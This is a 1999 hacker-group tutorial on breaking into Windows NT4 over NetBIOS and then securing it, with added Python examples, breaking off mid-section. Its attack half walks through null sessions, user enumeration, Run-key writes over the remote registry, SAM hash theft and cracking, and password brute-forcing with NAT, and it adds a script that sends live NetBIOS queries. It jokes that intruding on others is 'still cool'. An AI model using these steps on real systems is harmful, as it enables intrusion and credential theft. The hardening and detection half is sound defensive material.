----------------------------------------
%                                      %
%             gH Presents              %
%      NT4 Intrusion and Security      %
%             by Mnemonic              %
%                                      %
-----------------------------------------

simply global hell
owning the world one system at a time

===========================
[KeyRoot (KRS) ASCII logo]
KRS  http://www.weownyourlives.forever
===========================

NT4 Intrusion and Security
by Mnemonic
7/30/99
xkyller@hotmail.com
KeyRoot
www.weownyourlives.forever

===========================

Contents:

01 - Abstract
02 - Intro
03 - How You Can Use This
04 - NetBIOS Hacking
  4.1 - NAT Attacks
05 - Security
  5.1 - Password Policy
  5.2 - Renaming the Administrator Account
  5.3 - Auditing
  5.4 - Disabling the Guest Account
  5.5 - Share Passwords
  5.6 - Restricting the Registry
  5.7 - Permissions
  5.8 - SMB Signatures
  5.9 - Securing %systemroot%\repair\sam._
06 - NET commands
07 - Conclusion

===========================

01 - Abstract

This paper is about breaking into Windows NT 4.0 systems over NetBIOS (null
sessions, LMHOSTS, the remote registry, the repair-directory copy of the SAM
and password guessing with NAT), and then securing a system against each of
the methods I go over.

===========================

02 - Intro

Alright so you want to know how to break into NT4? Well don't keep reading if
that's your intention. This is about fixing your system so people like me
don't break into it. I thought about putting the intrusion methods and the
security features in the same section but I ended up separating them. I hope
you like it. And yes KeyRoot really does own your life forever. So does gH.

===========================

03 - How You Can Use This

As I'm writing this I'm hoping that you will be able to use this to secure
your system instead of using it to break into others. If you feel like
breaking into other systems that's still cool hehe.
Basically I don't care what you do as long as I'm of some help. Thanks for
reading and I'll release more stuff soon.

===========================

04 - NetBIOS Hacking

When you've got an NT machine that you want to break into, the first thing to
do is portscan it and see whether any of these ports is open:

   135/tcp   RPC endpoint mapper (not NetBIOS itself, but it's up on every NT box)
   137/udp   NetBIOS Name Service
   138/udp   NetBIOS Datagram Service
   139/tcp   NetBIOS Session Service (this is the one SMB runs over)

137-139 are the NetBIOS over TCP/IP ports; 139 is what every net command
below talks to and 137 is what nbtstat talks to. If you want to scan a range
of IPs for open shares you can use the Legion scanner.

Most of what I'll be covering is the use of LMHOSTS. Administrators use this
file to preload the names of other machines on the network into the NetBIOS
name cache so they can run utilities like regedit remotely against the systems
on their network. Be clear about what it does and doesn't do: LMHOSTS only
maps a NetBIOS name to an IP address. It doesn't log you in to anything, so
every name-based trick below still needs a session to the target, which is
what the null session further down is for. To open your LMHOSTS file do
Start.. Find.. Files or Folders.. lmhosts; on Windows 9x it's in the Windows
directory, on NT it's in %systemroot%\system32\drivers\etc (if all that's
there is the lmhosts.sam sample, create a file called lmhosts with no
extension next to it).

An LMHOSTS entry is the IP address first, then the name you want to use for it:

   targetip   anynameyouwant   #PRE   #DOM:domainname

#PRE preloads the entry into the name cache (at boot and on nbtstat -R)
instead of only consulting the file after a failed lookup; #DOM: marks the
entry as a domain controller for the named domain, which is what lets the
domain tools (User Manager for Domains, NetDom) find the box. The name you
pick is what you type after \\ from now on.

Now I'm going to discuss some things you probably already know and also some
things I haven't seen well documented. If the target doesn't require
credentials for its IPC$ share, which is the case the majority of the time,
you're set. Open a null session with the system first; the net commands and
Resource Kit tools below ride on that session:

   C:\>nbtstat -R                              <--- purges the cache and reloads the #PRE entries from LMHOSTS
   C:\>net use \\targetname\ipc$ "" /user:""
   The command completed successfully.

This connects you, with an empty user name and empty password, to the
system's IPC$ share, a default share used for inter-process communication
(named pipes and RPC). If the null session is refused, or the shares you want
need real credentials, you want to get a list of users so you can start
guessing passwords.
For this you can use nbtstat, which asks the target for its NetBIOS name table:

   C:\>nbtstat -A targetip

          NetBIOS Remote Machine Name Table

      Name               Type         Status
   ---------------------------------------------
   Mnemonic       <03>  UNIQUE      Registered
   KeyRoot        <03>  GROUP       Registered
   icesk          <03>  UNIQUE      Registered
   Mnemonic       <03>  UNIQUE      Registered

(-A takes the IP address, -a takes the name.) The <03> suffix is the Messenger
service, and it gets registered twice: once for the computer name and once
for the name of whoever is logged on. So every UNIQUE <03> name is either a
user or the name of the workstation, and a <03> name that doesn't also show
up as a UNIQUE <00> or <20> (the Workstation and Server service entries the
computer name always has) is a logged-on user. If the system is passworded
you can now start guessing passwords for these account names. If you still
can't get in, skip to the next section (NAT Attacks).

nbtstat has several other uses:

   C:\>nbtstat /?

   Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]

   Switches
      -a   Lists the remote computer's name table given its host name.
      -A   Lists the remote computer's name table given its IP address.
      -c   Lists the remote name cache including the IP addresses.
      -n   Lists local NetBIOS names.
      -r   Lists names resolved by broadcast and via WINS.
      -R   Purges and reloads the remote cache name table.
      -S   Lists sessions table with the destination IP addresses.
      -s   Lists sessions table converting destination IP addresses to host names.

You can use these other options to learn more about the system; nbtstat goes
over UDP 137 and does not require a null session. The following is the same
net view example as in my Windows 98 Security Issues advisory:

   C:\>net view \\targetname
   Shared resources at \\targetname

   Share name   Type      Used as   Comment
   -------------------------------------------------------------------------------
   ADMIN$       Disk                Remote Admin
   C$           Disk                C Drive
   D$           Disk                D Drive
   IPC$         IPC                 Remote IPC
   NETLOGON     Disk                Logon server share
   HPLaser4     Printer             HP LaserJet 4si
   The command completed successfully.

This just displayed the available shares on the system.
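Here is what nbtstat -A actually does on the wire, as an added example in
Python (not part of the original paper): it builds the NetBIOS Node Status
request that goes to UDP 137, decodes the name table in the reply, and applies
the "<03> but not <00>/<20>" rule above to pick out the logged-on users. The
SAMPLE_NAMES table, build_node_status_reply() and the MAC address in it are
constructed so the whole thing runs offline; query_node_status(ip) is the live
version.

```python
# Added example, not part of the original paper: the "nbtstat -A" exchange in Python.
# build_node_status_request() is the NetBIOS Node Status request sent to UDP 137,
# parse_node_status_reply() decodes the name table, logged_on_users() applies the
# "<03> but not <00>/<20>" rule. SAMPLE_NAMES, build_node_status_reply() and the MAC
# address are constructed test data so it runs offline; query_node_status() is live.
import socket
import struct

NBSTAT = 0x0021          # question/record type of a node status request
NETBIOS_NS_PORT = 137    # NetBIOS Name Service, UDP

# Meaning of the common suffixes (16th byte of a name), keyed by (suffix, is_group).
SUFFIXES = {
    (0x00, False): "Workstation Service (machine name)",
    (0x00, True):  "Domain or workgroup name",
    (0x03, False): "Messenger Service (machine name or logged-on user)",
    (0x1B, False): "Domain Master Browser (the PDC)",
    (0x1C, True):  "Domain controllers",
    (0x20, False): "Server Service (file shares)",
}

def encode_name(name, suffix=0x00):
    """First-level encoding (RFC 1001 14.1): 15-byte padded name plus suffix byte,
    each byte written as two nibbles offset by 'A', with a length byte in front."""
    if name == "*":
        raw = b"*" + b"\x00" * 15      # the wildcard name is NUL padded
    else:
        raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    encoded = bytearray()
    for b in raw:
        encoded += bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)])
    return b"\x20" + bytes(encoded) + b"\x00"

def build_node_status_request(txid=0x1234):
    """Header (ID, flags 0 = query, QDCOUNT 1) plus a question for '*' of type NBSTAT."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name("*") + struct.pack("!HH", NBSTAT, 0x0001)

def _skip_name(data, pos):
    """Step over an encoded name or a compression pointer; return the next offset."""
    while True:
        length = data[pos]
        if length == 0:
            return pos + 1
        if length & 0xC0 == 0xC0:
            return pos + 2
        pos += 1 + length

def parse_node_status_reply(data):
    """Decode a NODE STATUS RESPONSE (RFC 1002 4.2.18): one resource record whose RDATA
    is NUM_NAMES, then 18-byte entries (15-byte name, suffix, 2 flag bytes), then the MAC."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not a node status response")
    pos = 12
    for _ in range(qdcount):                        # question section, if echoed
        pos = _skip_name(data, pos) + 4
    pos = _skip_name(data, pos)
    rtype = struct.unpack("!HHIH", data[pos:pos + 10])[0]
    pos += 10
    if rtype != NBSTAT:
        raise ValueError("unexpected record type 0x%04x" % rtype)
    num_names, pos = data[pos], pos + 1
    names = []
    for _ in range(num_names):
        entry, pos = data[pos:pos + 18], pos + 18
        group = bool(struct.unpack("!H", entry[16:18])[0] & 0x8000)   # the G bit
        names.append({"name": entry[:15].rstrip(b" \x00").decode("ascii", "replace"),
                      "suffix": entry[15], "group": group,
                      "service": SUFFIXES.get((entry[15], group), "unknown")})
    return {"txid": txid, "names": names, "mac": data[pos:pos + 6].hex(":")}

def logged_on_users(info):
    """UNIQUE <03> names that are not also the machine's own UNIQUE <00>/<20> names."""
    machine = {n["name"] for n in info["names"] if not n["group"] and n["suffix"] in (0x00, 0x20)}
    users = {n["name"] for n in info["names"] if not n["group"] and n["suffix"] == 0x03}
    return sorted(users - machine)

def query_node_status(ip, timeout=2.0):
    """Live query against a real host (not used by the offline data below)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_node_status_request(), (ip, NETBIOS_NS_PORT))
        return parse_node_status_reply(sock.recvfrom(2048)[0])

# Constructed name table modelled on the paper's nbtstat -A output: (name, suffix, is_group).
SAMPLE_NAMES = [("MNEMONIC", 0x00, False), ("MNEMONIC", 0x20, False), ("MNEMONIC", 0x03, False),
                ("KEYROOT", 0x00, True), ("KEYROOT", 0x1C, True), ("KEYROOT", 0x1B, False),
                ("ICESK", 0x03, False)]

def build_node_status_reply(txid, names, mac=b"\x00\x50\x56\x00\x00\x01"):
    """Build a reply packet from (name, suffix, is_group) tuples, for offline testing."""
    entries = b"".join(n.upper().encode("ascii").ljust(15, b" ") + bytes([suffix])
                       + struct.pack("!H", (0x8000 if group else 0) | 0x0400)   # ACT bit
                       for n, suffix, group in names)
    rdata = bytes([len(names)]) + entries + mac + b"\x00" * 40   # 40 zero bytes of statistics
    header = struct.pack("!HHHHHH", txid, 0x8400, 0, 1, 0, 0)   # response, authoritative
    rr = encode_name("*") + struct.pack("!HHIH", NBSTAT, 0x0001, 0, len(rdata))
    return header + rr + rdata
```

Run it against the constructed reply with
parse_node_status_reply(build_node_status_reply(0x1234, SAMPLE_NAMES)) and
logged_on_users() comes back with ICESK only: MNEMONIC is a machine name
because it also holds the <00> and <20> entries. The request is the 50-byte
packet nbtstat sends, so the same builder is what you'd point at a real host.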
You can map to any of these shares using the net use command:

   C:\>net use \\targetname\sharename

or give it a drive letter so you can use it from Explorer:

   C:\>net use x: \\targetname\C$

On NT whether this works depends on who you are, not on a share password: the
$ admin shares need an account in Administrators, and a share the admin made
himself is governed by its share permissions (and the NTFS permissions
underneath). If the share gives Everyone Change or Full Control then you can
basically do anything you like in it.

The NT4 Resource Kit provides a series of net tools which work in cooperation
with LMHOSTS and the IPC$ null session:

NetWatch - lists all shares on the remote system

usrstat - shows name, full name, and last logon for each user on the system

   C:\>ntreskit\usrstat targetname
   Users at \\targetname
   Mnemonic - Administrator - logon: Sun Jul 29 20:15:25 1999
   MostHateD - Administrator - logon: Sun Jul 29 20:54:04 1999
   mindphasr - Administrator - logon: Sun Jul 29 15:19:26 1999

global - shows the members of global groups on the remote system

   C:\>ntreskit\global "administrators" targetname
   Mnemonic
   MostHateD
   mindphasr

local - shows the members of local groups on the remote system

   C:\>ntreskit\local "administrators" targetname
   Mnemonic

NetDom - queries the remote system for its role and PDC

   C:\>ntreskit\NetDom
   Querying domain information on computer \\targetname ...
   The computer \\targetname is
   Searching PDC for domain targetname ...
   Found PDC \\targetname
   The computer \\targetname is the PDC of .

Ok now you've got a basic feel for NetBIOS and how LMHOSTS works. Since the
target is now in your name cache you can open regedit or regedt32 in NT, do
Registry.. Connect Network Registry.. and enter the name you gave the target,
and edit their registry (whether the box lets you connect remotely at all is
decided by the winreg key covered in 5.6). There are so many possibilities
with the registry editor. To run a program on the system, for example, you can
edit the registry under:

   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   ...\RunOnce
   ...\RunOnceEx

On a default install these keys are remotely WRITE ACCESS to Everyone unless
the admin has changed it. All you have to do is add a value in the Run key
with the path of the file you want to run, and it runs the next time someone
logs on interactively, with that user's rights (if that's the administrator,
they're yours).
Let's say the administrator has created an Emergency Repair Disk with
rdisk /s. A compressed copy of the SAM (Security Account Manager) hive gets
written to:

   %systemroot%\repair\sam._

This file is READ EVERYONE by default. It holds the user names and the LM and
NT password hashes (not the plaintext passwords), so the hashes still have to
be cracked. Copy it over and expand it first:

   C:\>copy \\targetname\C$\winnt\repair\sam._ .
   C:\>expand sam._ sam

and then do File.. Import SAM File in L0phtCrack (download L0phtCrack from
www.l0pht.com), or dump it with a utility called samdump. Both give you the
user names and the hashes to crack. Two things to keep in mind: the file is
only as current as the last rdisk /s (the copy made at install time holds
nothing but Administrator and Guest), and if SYSKEY (SP3 and up) is turned on
the hashes in the hive are encrypted with an extra key and a straight import
won't work. If you can't read the file but already have an administrator-level
session, pwdump or L0phtCrack's own registry dump can pull the hashes out of
the live SAM instead. Either way, an administrator's hash cracked is basically
owning the system.

Ok another thing that you can do is run:

   %SystemRoot%\system32\musrmgr.exe

This opens User Manager (usrmgr.exe is User Manager for Domains on NT Server).
Since your system now believes the target is a domain controller it knows
about, you can do User.. Select Domain, enter the name from LMHOSTS and get a
list of all of the users on that box.

Ok another thing you can do is Start.. Find.. Computer and enter the name you
put in LMHOSTS. Click Find Now and the name will come up in the box. When you
open the name you'll see the other box's shares in your browser, so you can
access them this way too.

Ok that's all for the hacking section.

===========================

4.1 - NAT Attacks

Ok right now is a good time to use a tool called NAT, the NetBIOS Auditing
Tool, released by Rhino9. NAT is basically the best brute force tool released
for NetBIOS. It makes a series of SMB connections to a system, trying every
combination of the user names and passwords you give it in a userlist and a
passlist. This method of attack is one of the most common and is generally
effective even for getting an administrator's password, because hardly anybody
uses good policies in creating passwords. NAT can be used to attack a single
system or multiple systems.
As NAT's doing what it does it tells you what's going on step by step (NAT can
be downloaded from www.technotronic.com/microsoft.html). I found it
unnecessary for me to use NAT and show you what it looks like because it's
already been done in Rhino9's Wardoc:

   [*]--- Reading usernames from userlist.txt
   [*]--- Reading passwords from passlist.txt
   [*]--- Checking host: 0.0.0.0
   [*]--- Obtaining list of remote NetBIOS names
   [*]--- Attempting to connect with name: *
   [*]--- Unable to connect
   [*]--- Attempting to connect with name: *SMBSERVER
   [*]--- CONNECTED with name: *SMBSERVER
   [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
   [*]--- Server time is Tue Oct 14 11:33:46 1997
   [*]--- Timezone is UTC-4.0
   [*]--- Remote server wants us to encrypt, telling it not to
   [*]--- Attempting to connect with name: *SMBSERVER
   [*]--- CONNECTED with name: *SMBSERVER
   [*]--- Attempting to establish session
   [*]--- Was not able to establish session with no password
   [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMINISTRATOR'
   [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `GUEST'
   [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ROOT'
   [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMIN'
   [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `PASSWORD'
   [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `PASSWORD'
   [*]--- Obtained server information:
   Server=[AENEMA] User=[] Workgroup=[STATICA] Domain=[]
   [*]--- Obtained listing of shares:
   Sharename      Type      Comment
   ---------      ----      -------
   ADMIN$         Disk:     Remote Admin
   C$             Disk:     Default share
   D$             Disk:     Default share
   E$             Disk:     Default share
   HPLaser4       Printer:  HP LaserJet 4Si
   IPC$           IPC:      Remote IPC
   NETLOGON       Disk:     Logon server share
   print$         Disk:     Printer Drivers
   [*]--- This machine has a browse list:
   Server               Comment
   ---------            -------
   AENEMA
   [*]--- Attempting to access share: \\*SMBSERVER\
   [*]--- Unable to access
   [*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
   [*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
   [*]--- Checking write access in: \\*SMBSERVER\ADMIN$
   [*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
   [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
   [*]--- Attempting to access share: \\*SMBSERVER\C$
   [*]--- WARNING: Able to access share: \\*SMBSERVER\C$
   [*]--- Checking write access in: \\*SMBSERVER\C$
   [*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
   [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
   [*]--- Attempting to access share: \\*SMBSERVER\D$
   [*]--- WARNING: Able to access share: \\*SMBSERVER\D$
   [*]--- Checking write access in: \\*SMBSERVER\D$
   [*]--- WARNING: Directory is writeable: \\*SMBSERVER\D$
   [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\D$
   [*]--- Attempting to access share: \\*SMBSERVER\E$
   [*]--- WARNING: Able to access share: \\*SMBSERVER\E$
   [*]--- Checking write access in: \\*SMBSERVER\E$
   [*]--- WARNING: Directory is writeable: \\*SMBSERVER\E$
   [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\E$
   [*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
   [*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
   [*]--- Checking write access in: \\*SMBSERVER\NETLOGON
   [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
   [*]--- Attempting to access share: \\*SMBSERVER\print$
   [*]--- WARNING: Able to access share: \\*SMBSERVER\print$
   [*]--- Checking write access in: \\*SMBSERVER\print$
   [*]--- WARNING: Directory is writeable: \\*SMBSERVER\print$
   [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\print$
   [*]--- Attempting to access share: \\*SMBSERVER\ROOT
   [*]--- Unable to access
   [*]--- Attempting to access share: \\*SMBSERVER\WINNT$
   [*]--- Unable to access

Read the output from the top and you can see the three stages: first it tries
a null session (no password), then it walks the userlist against the passlist,
and once it's in it enumerates the shares and checks every one for write
access. Those three stages map straight onto section 05: RestrictAnonymous
stops the enumeration, the password policy and lockout stop the guessing, and
share and NTFS permissions stop the "Directory is writeable" lines.

===========================

05 - Security

Ok the first thing you need to do in securing your NT4 system is update to
Service Pack 5 if you haven't already done that. You can get SP5 at
www.cave.net/nt351sp5.htm.
The Service Pack secures your NT system to an extent, and several of the
settings below (RestrictAnonymous, Passfilt, SMB signatures) don't exist
before SP3. It's best to have the latest Service Pack and hot fixes
(ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40) to keep up
to date.

Anyway the easiest way to secure NetBIOS is not to use it at all. Don't assume
nothing is shared just because you never shared anything: on NT the Server
service starts by default and publishes ADMIN$, IPC$ and a C$-style share for
every drive on every Workstation and Server install. If the box doesn't need
to serve files to the outside, unbind WINS Client (TCP/IP) and the Server
service from the external adapter (Control Panel.. Network.. Bindings) and
filter 135-139 at the router, and you've taken away everything in section 04
in one go. If sharing is necessary there are still ways to secure it, and the
first thing I suggest is restricting null sessions.

Since securing your NT4 system is so extensive even with the little material
I'm covering here (basically how to defend against the attacks I went over)
I've decided to break this section up.

Ok real quick, umm.. you can restrict anonymous network access so not just
anybody can look up user names or shares. Add this value to the registry
(needs SP3 or later, and a reboot):

   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
   Value name:  RestrictAnonymous
   Type:        REG_DWORD
   Data:        1

Check it afterwards from another machine: net use \\yourbox\ipc$ "" /user:""
followed by net view \\yourbox and usrstat. The null session itself still
connects (that's normal on NT4, there is no value that refuses it outright)
but the share and user listings should now come back empty or access denied.
Known limitation: anonymous SID-to-name lookups through LSA still work with
this set, so a tool that walks SIDs (sid2user/user2sid) can still recover
account names. Rename and lock down the accounts anyway (5.2) and don't rely
on this alone.

===========================

5.1 - Password Policy

The basic out of the box NT4 system doesn't have a very strong password
policy. The first thing you need to do is open User Manager.. Policies..
Account.. where you have a lot of options. Basically you want:

   Maximum Password Age      expire passwords every thirty days
   Minimum Password Length   at least eight characters
   Password Uniqueness       remember the last several so they can't be reused
   Account Lockout           lock out after five bad logon attempts, and reset
                             the bad-attempt count after thirty minutes

Lockout does not apply to the built-in Administrator account (whatever you
rename it to), which is exactly the account NAT goes for first. The Resource
Kit's passprop /adminlockout makes it lockable for network logons while still
letting you log on at the console. Also if you keep up to date with your
Service Pack you can use Passfilt.dll, a password filter, to increase the
strength of your passwords. This DLL enforces the following requirements:

   Passwords must be at least six (6) characters long.
   Passwords must contain characters from at least three (3) of the following
   four (4) classes:

      English upper case letters
      English lower case letters
      Westernized Arabic numerals
      Non-alphanumeric ("special characters") such as punctuation symbols

   Passwords may not contain your user name or any part of your full name.

To configure Passfilt.dll, copy it into %systemroot%\system32 and edit this
value in the registry:

   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
   Value name:  Notification Packages
   Type:        REG_MULTI_SZ
   Data:        PASSFILT   (on its own line; leave any existing entries such as
                           FPNWCLNT in place)

Passfilt.dll is included in Service Pack 2 and up. It only checks passwords on
the machine where they get changed, so for domain accounts it has to be on the
PDC and every BDC, and it only applies to changes made after it's installed,
so the weak passwords already in the SAM stay weak until you expire them.

===========================

5.2 - Renaming the Administrator Account

The default admin account is Administrator, so attackers hit this account
more than any other. If you rename it the attacker is forced to guess the
account name as well. Go into User Manager.. User.. Rename and give it a new
name. Keep in mind the account's SID doesn't change (it always ends in -500),
so anybody who can do anonymous SID lookups can still find the new name;
renaming buys you time against dictionary tools like NAT, not against someone
who has already enumerated the box.

===========================

5.3 - Auditing

Alright. What you want to do in User Manager is open Policies.. Audit.. and
check the following:

   Logon and Logoff            success and failure
   Use of User Rights          success
   User and Group Management   success
   Security Policy Changes     success and failure

This turns on logging of these events, which me and ten billion other people
believe are security risks. Of course you want to log failed logon attempts
so that you know if someone is trying to break in (in the Security log, event
529 is a bad user name or password and 539 is an account lockout). The reason
why you want to log successful logons too is that an attacker might log on at
like 3 in the morning so no one will notice. It's easy to see there's an
intruder when you see the Administrator logging on in the middle of the
night, or at an hour you're usually at work. While you're at it, go into
Event Viewer.. Log.. Log Settings and make the Security log big enough (the
default 512K fills up fast once logon auditing is on) so the attacker's
attempts don't get overwritten before you read them.

===========================

5.4 - Disabling the Guest Account

While you're in User Manager go ahead and disable the Guest account, a
built-in account with no password. User.. Properties.. check Account
Disabled. NT Server ships with it disabled and NT Workstation doesn't, so
check either way.
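The Passfilt.dll rules from 5.1 as a checker you can run before a user tries
a new password, as an added example in Python (not part of the original
paper and not Passfilt's own code). The "any part of your full name" rule is
implemented as: split the full name on spaces, commas, periods, dashes,
underscores and pound signs, and reject pieces of three or more characters
that appear in the password; that tokenising is an assumption, the paper only
states the rule in one sentence. The SAMPLES list is constructed.

```python
# Added example, not part of the original paper: the Passfilt.dll rules from
# section 5.1 as a checker, plus the eight-character minimum the paper sets in
# User Manager (min_length=8). The full-name tokenising (split on delimiters,
# ignore pieces shorter than 3 characters) is an assumption about Passfilt.
import re

UPPER = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
LOWER = set("abcdefghijklmnopqrstuvwxyz")
DIGITS = set("0123456789")

def character_classes(password):
    """How many of the four Passfilt classes the password uses (0..4)."""
    chars = set(password)
    classes = 0
    classes += bool(chars & UPPER)
    classes += bool(chars & LOWER)
    classes += bool(chars & DIGITS)
    classes += bool(chars - UPPER - LOWER - DIGITS)   # anything else counts as "special"
    return classes

def name_tokens(full_name):
    """Pieces of the full name long enough to matter (assumed: 3+ characters)."""
    return [t for t in re.split(r"[\s,.\-_#]+", full_name) if len(t) >= 3]

def check_password(password, username, full_name="", min_length=6):
    """Return (ok, reason). min_length=6 is Passfilt's floor; pass 8 to also
    enforce the User Manager policy the paper recommends."""
    if len(password) < min_length:
        return False, "shorter than %d characters" % min_length
    if character_classes(password) < 3:
        return False, "needs characters from at least 3 of: upper, lower, digit, special"
    lowered = password.lower()
    if username and username.lower() in lowered:
        return False, "contains the user name"
    for token in name_tokens(full_name):
        if token.lower() in lowered:
            return False, "contains part of the full name (%s)" % token
    return True, "ok"

# Constructed candidates: (password, user name, full name).
SAMPLES = [
    ("password",    "mnemonic", "Mnemonic KeyRoot"),   # one class only
    ("Passw0rd",    "mnemonic", "Mnemonic KeyRoot"),   # three classes, passes
    ("Mnem0nic!",   "mnemonic", "Mnemonic KeyRoot"),   # leet spelling slips past the substring rule
    ("Mnemonic1!",  "mnemonic", "Mnemonic KeyRoot"),   # contains the user name
    ("KeyRoot99",   "mnemonic", "Mnemonic KeyRoot"),   # contains part of the full name
    ("Ab1!",        "mnemonic", "Mnemonic KeyRoot"),   # too short
    ("Tr0ub4dor&3", "mnemonic", "Mnemonic KeyRoot"),   # passes
]

def audit(samples=SAMPLES, min_length=6):
    """Run the checker over (password, username, full_name) tuples."""
    return [(pw,) + check_password(pw, user, full, min_length) for pw, user, full in samples]

if __name__ == "__main__":
    for pw, ok, why in audit():
        print("%-12s %-4s %s" % (pw, "PASS" if ok else "FAIL", why))
```

Note what the third sample shows: Passfilt's name rule is a literal substring
match, so "Mnem0nic!" gets through even though it's the user name with one
character swapped. That is exactly the kind of password a passlist with
common substitutions finds, so the filter is a floor, not a guarantee.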
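And here is what the auditing in 5.3 buys you, as an added example in Python
(not part of the original paper): detection logic run over Security log lines
that flags the NAT pattern from 4.1 using the thresholds set in 5.1 (five bad
logons inside thirty minutes), and reports whether a network logon from the
same workstation succeeded right after the burst. The input format is an
assumption: comma-delimited lines in the shape of an Event Viewer text export
(date, time, source, type, category, event ID, user, computer, description)
carrying the NT4 descriptions for event 529 (unknown user name or bad
password) and 528 (successful logon); SAMPLE_LOG is constructed.

```python
# Added example, not part of the original paper: detection of the NAT pattern
# from 4.1 over Security log lines, with the 5.1 thresholds. The line format is
# an assumption (Event Viewer-style comma-delimited export) and SAMPLE_LOG is
# constructed. 529 = bad user name or password, 528 = successful logon,
# Logon Type 3 = network logon (what an SMB connection produces).
import csv
import io
import re
from collections import defaultdict
from datetime import datetime, timedelta

FAIL = ("Logon Failure: Reason: Unknown user name or bad password User Name: %s "
        "Domain: KEYROOT Logon Type: 3 Logon Process: KSecDD Authentication Package: "
        "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Workstation Name: \\\\%s")
OK = ("Successful Logon: User Name: %s Domain: KEYROOT Logon ID: (0x0,0x1A2B) "
      "Logon Type: 3 Logon Process: KSecDD Workstation Name: \\\\%s")

def _line(time, event_id, user, workstation):
    """One constructed export line: date,time,source,type,category,id,user,computer,description."""
    kind = "Failure Audit" if event_id == 529 else "Success Audit"
    desc = (FAIL if event_id == 529 else OK) % (user, workstation)
    return "7/30/99,%s,Security,%s,Logon/Logoff,%d,SYSTEM,TARGET,%s" % (time, kind, event_id, desc)

SAMPLE_LOG = "\n".join([
    _line("3:01:50 AM", 529, "MostHateD", "AENEMA"),      # five guesses, none succeed
    _line("3:01:52 AM", 529, "MostHateD", "AENEMA"),
    _line("3:01:54 AM", 529, "MostHateD", "AENEMA"),
    _line("3:01:56 AM", 529, "MostHateD", "AENEMA"),
    _line("3:01:58 AM", 529, "MostHateD", "AENEMA"),
    _line("3:02:11 AM", 529, "Administrator", "AENEMA"),  # five guesses, then a hit
    _line("3:02:13 AM", 529, "Administrator", "AENEMA"),
    _line("3:02:15 AM", 529, "Administrator", "AENEMA"),
    _line("3:02:17 AM", 529, "Administrator", "AENEMA"),
    _line("3:02:19 AM", 529, "Administrator", "AENEMA"),
    _line("3:02:21 AM", 528, "Administrator", "AENEMA"),
    _line("9:14:02 AM", 529, "icesk", "ICESK"),           # a real user with a typo
    _line("9:14:20 AM", 528, "icesk", "ICESK"),
])

FIELD = re.compile(r"(User Name|Logon Type|Workstation Name):\s*(\S+)")

def parse_events(text):
    """Parse export lines into dicts, pulling the fields we need out of the description."""
    events = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) < 9:
            continue                                   # blank or malformed line
        date, time_, _, _, _, event_id, _, computer = row[:8]
        fields = dict(FIELD.findall(",".join(row[8:])))   # description may itself contain commas
        events.append({
            "time": datetime.strptime(date + " " + time_, "%m/%d/%y %I:%M:%S %p"),
            "event_id": int(event_id), "computer": computer,
            "user": fields.get("User Name", "").lower(),
            "logon_type": int(fields.get("Logon Type", "0")),
            "workstation": fields.get("Workstation Name", "").lstrip("\\").upper(),
        })
    return sorted(events, key=lambda e: e["time"])

def detect_guessing(events, threshold=5, window=timedelta(minutes=30)):
    """Alert on (user, workstation) pairs with >= threshold 529s inside one window, and
    record whether a 528 network logon from that workstation followed the burst."""
    failures = defaultdict(list)
    for e in events:
        if e["event_id"] == 529:
            failures[(e["user"], e["workstation"])].append(e["time"])
    alerts = []
    for (user, ws), times in failures.items():
        for start in times:
            burst = [t for t in times if start <= t <= start + window]
            if len(burst) < threshold:
                continue
            success = next((e["time"] for e in events
                            if e["event_id"] == 528 and e["logon_type"] == 3
                            and e["user"] == user and e["workstation"] == ws
                            and burst[-1] <= e["time"] <= start + window), None)
            alerts.append({"user": user, "workstation": ws, "failures": len(burst),
                           "first": start, "last": burst[-1],
                           "guess_succeeded": success is not None, "success_at": success})
            break                                      # one alert per pair is enough
    return alerts

if __name__ == "__main__":
    for a in detect_guessing(parse_events(SAMPLE_LOG)):
        print("%-14s from %-8s %d failures %s..%s  guessed: %s" % (
            a["user"], a["workstation"], a["failures"], a["first"].time(),
            a["last"].time(), "YES at %s" % a["success_at"].time() if a["guess_succeeded"] else "no"))
```

Two alerts come out of the sample: MostHateD (five failures, no success) and
Administrator (five failures followed by a successful network logon from the
same workstation, which is the line to wake somebody up for). The single
failure from icesk stays below the threshold. Keep the threshold equal to the
lockout count from 5.1: the Administrator account never locks out, so this
check is the only thing that notices a guessing run against it.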
===========================

5.5 - Share Passwords

Even if an attacker gets access to an account you can still restrict his
access to the system with permissions on all shares. NT doesn't do share
passwords the way Windows 9x does; a share has a permission list of its own
